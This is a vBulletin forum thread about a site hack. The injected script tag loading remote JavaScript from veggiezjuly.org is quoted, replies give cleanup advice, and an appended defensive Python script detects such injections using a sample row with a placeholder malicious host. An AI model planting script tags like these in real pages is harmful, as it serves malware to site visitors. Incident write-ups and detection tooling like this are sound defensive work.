We were hacked. Found the cure - tracking down the root cause

  • Spinball
    Senior Member
    • Oct 2001
    • 589
    • 3.8.x


    Noticed when I hit our site this morning that the JS was broken.
    Then I got an Avast malware error and saw that this code was in headerinclude template area:

    HTML Code:
    <link rel="alternate" type="application/rss+xml" title="AVForums.com RSS Feed" href="http://www.avforums.com/forums/external.php?type=RSS2" />
    <script type="text/javascript" src="http://www.veggiezjuly.org/eos.js?sscoo"></script>
    <script type="text/javascript" src="http://www.avforums.com/forums/clientscript/ame.js" >
    veggiezjuly is the hack which happened some time overnight.
    Closed the forums and started investigating. Nothing in Google.
    We hadn't had any file, template or plugin edits, unusual ftp access or control panel log activity showing for that period of time.
    Removing this from the headinclude template fixed it:

    HTML Code:
    <if condition="$vboptions['externalrss']">
        <link rel="alternate" type="application/rss+xml" title="$vboptions[bbtitle] RSS Feed" href="external.php?type=RSS2" />
        <if condition="$show['foruminfo'] OR $show['threadinfo']">
            <link rel="alternate" type="application/rss+xml" title="$vboptions[bbtitle] - $foruminfo[title_clean] - RSS Feed" href="external.php?type=RSS2&amp;forumids=$foruminfo[forumid]" />
        </if>
    </if>
    Then we put that code back, but the veggiezjuly line didn't return.
    Still investigating.
    It's something relating to the external.php script.
    Stuart Wright, founder AVForums.com. [strike]13[/strike] 15 million posts and counting.
    vBulletin user from 2001. We stopped upgrading vB at 3.8.2 and sadly we're going no further.
  • Matthew Gordon
    Senior Member
    • May 2002
    • 3243
    • 1.1.x

    #2
    I doubt removing the code was the fix - rather, the act of saving the template in the Admin CP was the fix. A lot of hacks modify the compiled version of the template directly in the database, so saving the template in the Admin CP will recompile the template and remove the malicious code. Running this tool should clear up any other templates modified like this. This post details steps to finding other malicious code on your site. Make sure you are running the latest versions of vBulletin and any products/plugins that you are using.


    • Spinball
      Senior Member
      • Oct 2001
      • 589
      • 3.8.x

      #3
      I agree. It was an SQL injection, I'm sure.
      Stuart Wright, founder AVForums.com. [strike]13[/strike] 15 million posts and counting.
      vBulletin user from 2001. We stopped upgrading vB at 3.8.2 and sadly we're going no further.


      • fishunter
        New Member
        • Oct 2008
        • 1

        #4
        How can I 'save' the template file in admin CP as mentioned below?

        I ran this tool; it said no templates needed recompiling, but I am still getting the warning from Avast. At a file level, nothing has been changed. I suspect it is the version in the database that has the code injection/issue.
        How can I regenerate the elements in the database?

        Thanks,
        Greg

        Originally posted by Matthew Gordon
        "I doubt removing the code was the fix - rather, the act of saving the template in the Admin CP was the fix. A lot of hacks modify the compiled version of the template directly in the database, so saving the template in the Admin CP will recompile the template and remove the malicious code. Running this tool should clear up any other templates modified like this. This post details steps to finding other malicious code on your site. Make sure you are running the latest versions of vBulletin and any products/plugins that you are using."


        • Matthew Gordon
          Senior Member
          • May 2002
          • 3243
          • 1.1.x

          #5
          You just edit the template affected and save it without touching anything. However, if the template recompiler tool didn't find it, I doubt saving it like that will either. Start looking elsewhere - plugins are also stored in the database and can be used to inject code into the HTML output.

          See this article for more information.
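          The thread's point (#2 and #5) is that the malicious script lived only in the compiled copy of the template stored in the database, not in the editable source, so a file-level check finds nothing. The script below is an added example, not code from this thread or from vBulletin: it takes template rows shaped like vBulletin 3.x's `template` table (assumed column names `title`, `template_un` for the source and `template` for the compiled copy, with quotes backslash-escaped in the compiled copy) and flags any `<script src>` host that appears in the compiled copy but neither in the source nor in the forum's own hostnames. The rows here are constructed samples; in practice you would feed it the result of a `SELECT` over that table.

```python
import re
from urllib.parse import urlparse

# Matches <script ... src="..."> after escaped quotes have been normalised.
SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

def script_hosts(html):
    """Return the set of hostnames referenced by <script src=...> tags.
    Relative paths (e.g. clientscript/ame.js) have no host and are skipped."""
    normalised = html.replace('\\"', '"')  # compiled vB templates escape quotes (assumption)
    hosts = set()
    for src in SCRIPT_SRC.findall(normalised):
        host = urlparse(src).hostname
        if host:
            hosts.add(host.lower())
    return hosts

def find_injected_scripts(rows, own_hosts):
    """rows: dicts with title, template_un (source) and template (compiled copy).
    Returns (title, [suspicious hosts]) for every template whose compiled copy
    loads a script from a host absent from both the source and own_hosts."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for row in rows:
        suspicious = script_hosts(row["template"]) - script_hosts(row["template_un"]) - own
        if suspicious:
            findings.append((row["title"], sorted(suspicious)))
    return findings

# Constructed sample rows (not real data); evil-cdn.invalid is a placeholder host.
SAMPLE_ROWS = [
    {"title": "headinclude",
     "template_un": '<link rel="alternate" href="external.php?type=RSS2" />\n'
                    '<script type="text/javascript" src="clientscript/ame.js"></script>',
     "template": '<link rel=\\"alternate\\" href=\\"external.php?type=RSS2\\" />\n'
                 '<script type=\\"text/javascript\\" src=\\"http://evil-cdn.invalid/eos.js?x\\"></script>\n'
                 '<script type=\\"text/javascript\\" src=\\"clientscript/ame.js\\"></script>'},
    {"title": "footer",
     "template_un": '<script src="http://www.example.com/forums/clientscript/vbulletin_global.js"></script>',
     "template": '<script src=\\"http://www.example.com/forums/clientscript/vbulletin_global.js\\"></script>'},
]
OWN_HOSTS = {"www.example.com"}

if __name__ == "__main__":
    for title, hosts in find_injected_scripts(SAMPLE_ROWS, OWN_HOSTS):
        print(f"template '{title}' loads scripts from unexpected host(s): {', '.join(hosts)}")
```

A template that is flagged is a candidate for re-saving in the Admin CP (which recompiles it); the same idea applies to the `plugin` table mentioned in #5, where the injected code would sit in the plugin's PHP rather than in HTML.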
